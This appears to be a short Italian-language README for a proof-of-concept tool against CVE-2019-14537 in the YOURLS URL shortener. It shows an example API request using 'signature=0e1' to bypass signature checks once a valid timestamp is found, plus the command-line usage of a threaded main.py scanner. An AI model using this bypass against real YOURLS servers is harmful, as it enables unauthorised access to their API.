
CVE-2019-14537 PoC

Quando ottieni un timestamp valido, sarai in grado di fare richieste all'API.
http://domain.com/yourls-api.php?signature=0e1&action=db-stats×tamp=VALID_TIMESTAMP
usage: main.py [-h] [--vhost VHOST] [--threads THREADS] [--path PATH]
[--port PORT]
[ip]
CVE-2019-14537 PoC
positional arguments:
ip IP di Yourls
optional arguments:
-h, --help mostra questo messaggio di aiuto ed esci
--vhost VHOST nome host (nome di dominio)
--threads THREADS numero di thread (predefinito: 10)
--path PATH percorso di yourls-api.php (predefinito: /yourls-api.php)
--port PORT porta (predefinito: 80)